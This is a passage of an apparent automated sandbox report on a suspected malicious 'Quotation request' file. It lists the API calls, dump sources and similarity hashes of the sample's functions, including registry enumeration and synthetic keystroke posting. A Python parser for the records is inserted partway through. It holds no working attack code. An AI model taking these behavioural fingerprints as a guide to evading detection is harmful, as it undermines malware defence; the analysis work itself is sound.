                                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                    APIs
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 780548581-3081909835
                                                                    • Opcode ID: ca32d8b5daa25cf76ab800feac3d76d182c9ad6713458097c0e165800db287f0
                                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                    • Opcode Fuzzy Hash: ca32d8b5daa25cf76ab800feac3d76d182c9ad6713458097c0e165800db287f0
                                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                    APIs
                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                    • String ID:
                                                                    • API String ID: 4082120231-0
                                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2027346449-0
                                                                    • Opcode ID: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                    • Opcode Fuzzy Hash: fd9ec896851cfe8ba5d77e6eb7557ecd2b90a16d2ad207272d237edd4ee25537
                                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                    • GetMenu.USER32 ref: 0047A703
                                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3257027151-0
                                                                    • Opcode ID: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                    • Opcode Fuzzy Hash: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                    APIs
                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastselect
                                                                    • String ID:
                                                                    • API String ID: 215497628-0
                                                                    • Opcode ID: aac5e18a3bb97d0b3b057d0757e795e8db7db4a5794c1ad7995d0996ba845476
                                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                    • Opcode Fuzzy Hash: aac5e18a3bb97d0b3b057d0757e795e8db7db4a5794c1ad7995d0996ba845476
                                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0044443B
                                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00444633
                                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
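The two records above (GetKeyboardState / SetKeyboardState followed by four PostMessageW calls, one function with uMsg 00000101 and one with 00000100) and the RegConnectRegistryW / RegEnumValueW walker further up are machine-generated listings, and the quickest way to reason about them is to parse them rather than read the hex by eye. The script below is an added example, not code from Joe Sandbox or from the analysed sample: it parses this page's record format (one record ends at its "Instruction Fuzzy Hash" line), turns each "Name.MODULE(args), ref: addr" line into a structured call, and names the uMsg / wParam values of the PostMessageW calls using the standard Win32 constants (WM_KEYDOWN 0x100, WM_KEYUP 0x101, WM_COMMAND 0x111, VK_SHIFT 0x10, VK_CONTROL 0x11, VK_MENU 0x12, VK_LWIN 0x5B). SAMPLE is a constructed excerpt copied from the records on this page; the dataclass and function names are my own.

```python
"""Parse Joe Sandbox per-function "APIs" records and decode PostMessageW constants.

Added example, not part of the Joe Sandbox report or the sample under analysis.
SAMPLE is a constructed excerpt copied from this page's records; WM_*/VK_* names
are the public Win32 header constants. Everything else is derived from the text.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Similarity
• API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
• Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Similarity
• API ID: MessagePost$KeyboardState$Parent
• Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Similarity
• API ID: MessagePost$KeyboardState$Parent
• Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
"""

# Matches "• GetParent.USER32(?), ref: 0044443B", "• _wcslen.LIBCMT ref: 00467793"
# and the indented "• Part of subcall function XXXXXXXX: ..." variant.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
FIELD_RE = re.compile(r"•\s*(?P<key>API ID|Instruction Fuzzy Hash):\s*(?P<value>.*)")

WM_NAMES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple                       # int for concrete values, None for "?" (unresolved)
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    api_id: str = ""
    fuzzy_hash: str = ""
    calls: list = field(default_factory=list)


def _parse_arg(text):
    text = text.strip()
    return None if text in ("", "?") else int(text, 16)  # "-00000001" -> -1


def parse_records(text):
    """Split report text into FunctionRecords; a record ends at its fuzzy hash line."""
    records, current = [], FunctionRecord()
    for line in text.splitlines():
        if m := CALL_RE.search(line):
            args = () if m["args"] is None else tuple(_parse_arg(a) for a in m["args"].split(","))
            parent = int(m["parent"], 16) if m["parent"] else None
            current.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), parent))
        elif m := FIELD_RE.search(line):
            if m["key"] == "API ID":
                current.api_id = m["value"].strip()
            else:
                current.fuzzy_hash = m["value"].strip()
                records.append(current)
                current = FunctionRecord()
    return records


def decode_message(call):
    """Name uMsg and wParam of a PostMessageW/SendMessageW call; unknown values stay hex."""
    msg, wparam = call.args[1], call.args[2]
    msg_name = "?" if msg is None else WM_NAMES.get(msg, f"0x{msg:04X}")
    key_name = "?" if wparam is None else VK_NAMES.get(wparam, f"0x{wparam:04X}")
    return (msg_name, key_name)


def synthetic_modifier_keys(records):
    """Functions that read/write the keyboard state table and then post key messages.
    Returns {fuzzy_hash: [(message, key), ...]} using only the function's own calls."""
    found = {}
    for rec in records:
        names = {c.name for c in rec.calls if c.subcall_of is None}
        if {"GetKeyboardState", "SetKeyboardState", "PostMessageW"} <= names:
            found[rec.fuzzy_hash] = [decode_message(c) for c in rec.calls if c.name == "PostMessageW"]
    return found


def group_by_api_id(records):
    """API ID is built from API names only, so argument-level variants share a group."""
    groups = {}
    for rec in records:
        groups.setdefault(rec.api_id, []).append(rec.fuzzy_hash)
    return groups


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for fuzzy, keys in synthetic_modifier_keys(recs).items():
        print(fuzzy[:16], keys)
    print(group_by_api_id(recs))
```

Two things fall out of running this on the excerpt. The "API ID" field is derived from API names alone, so the function posting WM_KEYUP and the one posting WM_KEYDOWN share the ID MessagePost$KeyboardState$Parent while their instruction fuzzy hashes differ; only the decoded arguments show that one function posts synthetic key-down and the other key-up messages for Shift, Ctrl, Alt and the left Windows key to the parent window. And the RegEnumValueW call carries the index argument -00000001 with several unresolved "?" operands, which the parser keeps as None rather than guessing, so a downstream rule can distinguish "constant seen in the dump" from "computed at runtime".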
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                    • String ID:
                                                                    • API String ID: 2354583917-0
                                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                    • String ID:
                                                                    • API String ID: 896007046-0
                                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                    • GetFocus.USER32 ref: 00448ACF
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
